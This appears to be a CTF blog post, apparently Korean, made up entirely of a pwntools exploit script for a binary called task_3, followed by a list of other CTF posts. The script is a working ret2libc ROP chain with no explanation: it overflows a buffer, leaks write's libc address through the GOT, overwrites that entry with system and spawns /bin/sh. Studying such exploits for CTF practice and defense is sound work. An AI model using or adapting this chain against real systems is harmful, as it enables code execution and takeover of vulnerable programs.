1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 | from pwn import *r = process("./task_3")elf = ELF("./task_3")read_plt = elf.plt['read']write_plt = elf.plt['write']write_got = elf.got['write']pppr = 0x0804855dbss = elf.bss()binsh = "/bin/sh\x00"payload = "\x90"*140payload += p32(write_plt)payload += p32(pppr)payload += p32(1)payload += p32(write_got)payload += p32(6)payload += p32(read_plt)payload += p32(pppr)payload += p32(0)payload += p32(write_got)payload += p32(4)payload += p32(read_plt)payload += p32(pppr)payload += p32(0)payload += p32(bss)payload += p32(8)payload += p32(write_plt)payload += "\x90"*4payload += p32(bss)r.sendline(payload)libc_write = u32(r.recv(4))libc_system = libc_write - 0x9add0log.info("libc_write = {}".format(hex(libc_write)))log.info("libc_system = {}".format(hex(libc_system)))r.send(p32(libc_system))r.send(binsh)r.interactive() |
'CTF' 카테고리의 다른 글
| CSAW2016 tutorial (0) | 2019.02.01 |
|---|---|
| TJCTF 2016 oneshot (0) | 2019.01.24 |
| SEC-T CTF PingPong (0) | 2018.09.16 |
| BCTF 2016 bcloud (0) | 2018.08.24 |
| Defcon 2014 Babyfirst heap (0) | 2018.08.16 |